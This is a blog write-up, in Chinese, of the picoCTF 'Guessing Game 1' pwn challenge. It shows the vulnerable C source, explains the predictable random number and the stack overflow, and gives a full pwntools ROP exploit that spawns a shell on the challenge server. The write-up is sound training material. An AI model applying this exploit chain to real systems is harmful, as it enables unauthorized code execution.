picoCTF pwn wp - Guessing Game 1

最新推荐文章于 2022-04-16 19:01:15 发布
最新推荐文章于 2022-04-16 19:01:15 发布
阅读量281 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/117988899
版权 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#define BUFSIZE 100


long increment(long in) {
	return in + 1;
}

long get_random() {
	return rand() % BUFSIZE;
}

int do_stuff() {
	long ans = get_random();
	ans = increment(ans);
	int res = 0;
	
	printf("What number would you like to guess?\n");
	char guess[BUFSIZE];
	fgets(guess, BUFSIZE, stdin);
	
	long g = atol(guess);
	if (!g) {
		printf("That's not a valid number!\n");
	} else {
		if (g == ans) {
			printf("Congrats! You win! Your prize is this print statement!\n\n");
			res = 1;
		} else {
			printf("Nope!\n\n");
		}
	}
	return res;
}

void win() {
	char winner[BUFSIZE];
	printf("New winner!\nName? ");
	fgets(winner, 360, stdin);
	printf("Congrats %s\n\n", winner);
}

int main(int argc, char **argv){
	setvbuf(stdout, NULL, _IONBF, 0);
	// Set the gid to the effective gid
	// this prevents /bin/sh from dropping the privileges
	gid_t gid = getegid();
	setresgid(gid, gid, gid);
	
	int res;
	
	printf("Welcome to my guessing game!\n\n");
	
	while (1) {
		res = do_stuff();
		if (res) {
			win();
		}
	}
	
	return 0;
}

在这里插入图片描述

rand()函数没有初始化, 可以调试找到随机数, 通过随机数检测以后到达溢出点

在这里插入图片描述

随机数0x53 + 1 = 83 + 1 = 84

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

有canary不能栈溢出, 有NX不能ret2shellcode, 静态编译不能ret2libc, 那就ROP, 在可写段写入"/bin/sh", 然后利用程序自身的system调用, 函数说明可见https://syscalls.w3challs.com/?arch=x86

在这里插入图片描述

eax = 11
ebx = addr
ecx = edx = 0

用gadget设置好寄存器, 然后int80实现调用execve("/bin/sh")
不过在这之前需要将"/bin/sh"写入内存
在这里插入图片描述
找到可写段0x6b7000, 找到gadget, 不过没有设置ecx的, 所以这里赌一把ecx执行过程中通常为0, 就不设置ecx
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

为了写入数据, 需要用到mov [rdi], rdx的指令, 直接将rdx的内容放入rdi所指地址中, rdx中放入8字节字符串"/bin/sh\x00"

from pwn import *
from pwnlib import context
from pwnlib.replacements import sleep
from pwnlib.util.cyclic import cyclic_find
from pwnlib.util.misc import write

context.log_level = "debug"
sel = 1
io = process("./vuln") if sel == 0 else remote('3.131.60.8',38467)

elf = ELF("./vuln")
pad = 0x70 + 8
pop_rax_rdx_rbx_addr = 0x0000000000482776
binsh_addr = 0x6b7000
mov_rdi_rdx_addr = 0x0000000000436393
pop_rdi_addr = 0x0000000000400696
pop_rdx_addr = 0x000000000044a6b5
int80_addr = 0x0000000000468fea

payload = cyclic(pad) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(pop_rdx_addr)
payload += b"/bin/sh\x00" + p64(mov_rdi_rdx_addr) + p64(pop_rax_rdx_rbx_addr)
payload += p64(11) + p64(0) + p64(binsh_addr) + p64(int80_addr)

io.sendlineafter("What number would you like to guess?\n", "84")
io.sendlineafter("Name? ", payload)
io.interactive()

在这里插入图片描述

fa1c4
关注
专栏目录
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4271
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
picoctf-2014-writeups:2014 年 PicoCTF 挑战的文章
07-07
picoctf-2014-writeups 2014 年 PicoCTF 挑战的文章
picoCTF pwn wp - Guessing Game 2
fa1c4的blog
06-25 424
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #define BUFSIZE 512 long get_random() { return rand; } int get_version() { return 2; } int do_stuff() { long ans .
picoCTF 2022 wp
heartbewith的博客
03-26 4516
Crypto Very Smooth 描述 Forget safe primes… Here, we like to live life dangerously… >:) gen.py #!/usr/bin/python from binascii import hexlify from gmpy2 import * import math import os import sys if sys.version_info < (3, 9): math.gcd = gcd ma
picoCTF-RE-otp WP
weixin_43781139的博客
10-15 617
今天被大佬学弟带着做了一道国外的ctf,质量果然和国内的套娃题不一样,挺有意思的,写个wp纪念一下。 64位elf文件,无壳,用ida64打开,主要算法代码如下: int __cdecl main(int argc, const char **argv, const char **envp) { int result; // eax char v4; // al char v5; // dl unsigned int v6; // eax int i; // [rsp+18h] [rbp
picoCTF 2022 一些题目的wp
aoao331198的博客
03-27 1655
picoCTF 2022 一些题目的wp 这里记录一下picoCTF 2022 中做出来的题目 文章目录WEB1.Includes2.Inspect HTML3.Local Authority4.Search source5.Forbidden Paths6.Power CookieCrypto1. WEB 1.Includes 打开开发者工具,在style.css中看见flag 2.Inspect HTML 查看源代码 3.Local Authority 密码找到 4.Search source C
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
buuctf GUESS,ZCTF note2学习
weixin_46521144的博客
07-09 301
GUESS 知识点 stack smash\environ泄露栈地址 题解 这道题是一道栈题,好久没见栈题。 可以看到程序会把flag读入内存,之后fork子进程让你猜。这里需要事先了解fork工作方式:把父进程虚拟内存空间完全复制一份(具体来说,私有写时复制)这说明子进程会复制flag,以及栈上所有内容。利用这一点以及题目给我们的三次机会,结合canary smash原理解题。 stack smash之后会输出一串字符串,其地址是environ[0]。基本思路是通过gets()栈溢出,修改environ[
picoCTF-Platform-2:picoCTF 2014 的通用版本,可轻松适应举办 CTF 或编程比赛
06-22
picoCTF-平台2 picoCTF Platform 2 是 picoCTF 运行的基础设施。 该平台旨在轻松适应其他 CTF 或编程比赛。 picoCTF 平台 2 以 Ubuntu 14.04 LTS 为目标,但应该适用于任何“标准”Linux 发行版。 它甚至可能适用于 Windows。 必须安装MongoDB; 所有默认配置都应该有效。 配置 下载 VirtualBox(最简单,但其他人可以工作) 下载 Vagrant (vagrantup.com) 在 repo 中vagrant up 等待 20 分钟 vagrant ssh连接到虚拟机 运行devploy部署站点的开发版本 转到主机上的端口 8080 请记住始终使用 127.0.0.1:8080 而不是 localhost:8080 注:比赛有两种模式:比赛主动和比赛不主动。 在非活动模式下,没有问题,只有注
picoCTF:picoCTF挑战的解决方案
03-31
微微CTF 您好,我将尽可能详细地发布针对picoCTF问题的解决方案。 我建议您先尝试自己解决问题,如果遇到困难,可以按照我的详细解决方案进行操作!
PicoCTF】guess number 1
weixin_51055545的博客
04-16 378
例行检查: 分析 64位程序,一道静态编译的题目,ida中分析: 主要要绕过的函数为do_stuff(),双击进去查看: 我们这要猜对数字,就会返回v5=1,然后就会在主函数执行win()函数,win()函数中存在栈溢出: 大小为0x168,思路就很清晰了,接下来就开始exp的编写, exp分析: 猜数字直接调试就可以看到是0x54,也就是84 刚开始我就直接用: root@ubuntu:/home/giantbranch/Desktop/pico# ROPgadget --binary vuln
picoCTF pwn wp - Here‘s a LIBC
fa1c4的blog
06-26 368
直接运行不正确, 需要更换ld文件 libc版本是2.27的, 所以ld文件需要匹配成2.27的 用glibc-all-in-one下载debug组件, 里边有ld文件, 拷贝过去 用patchelf命令执行libc和ld文件的替换操作 patchelf --replace-needed libc.so.6 ./libc.so.6 ./alibc patchelf --set-interpreter ./ld-2.27.so ./alibc 然后就能正常运行 栈溢出, ret2libc, 构..
CTF-Crypto-学习笔记
热门推荐
小龙在线
08-22 1万+
最常见的字符编码规范 ASCII 为了在计算机中表示字符,在设计编码的时候用1个字节也就是8bit位数来编码英文字符集 拉丁字母及标点符号 阿拉伯数字 一些控制字符 这就是 ASCII(American Standard Code for InformationInterchange, 美国信息交换标准代码) Python中,使用 chr( ) 函数可得 ASCII 对应的字符,使用 ord( ) 函数可得字符的 ASCII码。 Unicode 字符集 Unicode(万国码、统一码、国际码)用于编码
CTF|栈溢出guess num 练习及知识点总结
skyattractive的博客
05-31 1180
CTF|栈溢出题目guess_num 练习及知识点总结 博客主要记录博主做的一栈溢出题目和所涉及到的知识点的总结 . 题目 将得到的文件拖入64位IDA中F5反编译得到伪代码 观察伪代码 得到如下信息: 定义char型 v9 让你输入内容,用gets()函数获取你输入的值,但是没有做限制 将v6 = v8就success! 实现success!之后可以进入sub-C3E函数,即可得到flag! 其中代码涉及到两个特殊的函数 关于两个函数的知识点如下: rand()函数用来产生随机数,但是,ran.
2021 Picoctf pwn部分wp
weixin_46521144的博客
07-18 542
首先说一下,是参考了校内学长的复盘讲解hhh,这也是第一次直接接触在线的ctf而不是靶场。 Gauntlet1 在ida里面看一下。这三道Gauntlet都是一个类型的,漏洞都是一个格式化字符串+栈溢出。 那就很容易直接把shellcraft.sh()写道栈上,因为一开始给打印了背写区域的起始位置并且使可执行的栈,一溢出就会跳转到我们写的shellcraft上面执行。注意中间还要有个格式化字符串的额send,不要忘了,之前卡在这里好久啊。。。 exp from pwn import * context.
网鼎杯pwnGUESS
Peanuts
08-30 1991
做了网鼎杯才发现自己有多菜。。。 拿到题目先ida一波 基本分析 看到了发现了是一个本地加载flag.txt所以有可能可以用stack samsh:详细可以看ctf wiki上的花式栈溢出技巧然后拖入gdb 进行一波checksec             可以发现有了nx栈不可执行这个还好,但是看到了cannary就有点头疼了。。还好有stack smash这个方法可以...
pwntools中fmtstr的使用
fa1c4的blog
02-01 4229
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
攻防世界pwn-forgot
最新发布
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值